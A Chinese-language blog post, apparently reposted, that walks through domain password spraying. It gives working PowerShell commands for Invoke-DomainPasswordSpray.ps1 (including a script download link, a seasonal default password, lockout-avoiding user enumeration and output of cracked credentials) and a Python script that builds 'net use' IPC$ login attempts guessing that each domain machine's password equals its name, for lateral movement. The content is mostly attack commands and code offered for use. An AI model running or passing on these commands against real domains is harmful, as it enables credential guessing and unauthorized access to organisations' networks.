域滲透:密碼噴射攻擊


前言:根據用戶名密碼規則來進行模糊測試

Invoke-DomainPasswordSpray.ps1腳本地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt


自動生成來自當前用戶域的用戶列表,並嘗試使用每個用戶名和Winter2016密碼進行身份驗證。

powershell Invoke-DomainPasswordSpray.ps1 -Password Winter2016


從域中收集用戶列表存儲到user.txt中

Import-Module .\Invoke-DomainPasswordSpray.ps1
Get-DomainUserList -Domain pentest.God -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii user.txt

從users.txt中提取用戶名,與pass.txt中的密碼對照成一對口令,進行域認證枚舉,登錄成功的結果將會輸出到sprayed-creds.txt

powershell .\Invoke-DomainPasswordSpray.ps1 -UserList user.txt -Domain pentest.God -PasswordList pass.txt -OutFile sprayed-creds.txt


之前看到冰冰的操作:洗數據,自己也嘗試的寫了一個方便來橫向,自己的思路就簡單點就直接機器名和密碼相同進行傳遞,然后還可以進行改改,上面的ps腳本是來進行域中用戶來進行攻擊的,自己就嘗試本地組來進行測試,雖然有點雞肋,確實雞肋,就當作自己練習了下吧,以后有好的想法再改!

# coding=utf-8
# 拆分域機器名,拼湊ipc格式,進行批量ipc
import re
import sys


content_regexp = "\s+"  # 多個空格進行字符串拆分到數組
LocalNetUseFormat = "net use \\\\{0} /u:a\\{1} {2}"
DomainNetUseFormat = "net use \\\\{0} /u:{1}\\{2} {3}"
# 首先把net group "Domain Computers" /domain得到的域機器名字放在文本中
with open("C:\\Users\\dell\\Desktop\\自己練手腳本\\IPC$橫向批處理\\computer.txt", 'r') as f:
    content = f.read()
    # print(content_line)
    computer_content_array = re.split(content_regexp, content)
    # with open("domain_computer_username.txt", 'w') as b:  # 只能寫,如果文件不存在則創建
    for computer in computer_content_array:
        # b.write(computer[:-1] + "\n")
        print(LocalNetUseFormat.format(
            computer[:-1], computer[:-1], computer[:-1]))  # 賬號為機器名 密碼為機器名
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "pass@123"))
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "p@ssw0rd"))
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + computer[:-1] + "123"))


# print("處理成功,保存在當前目錄下的domain_computer_username.txt文件中....")


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM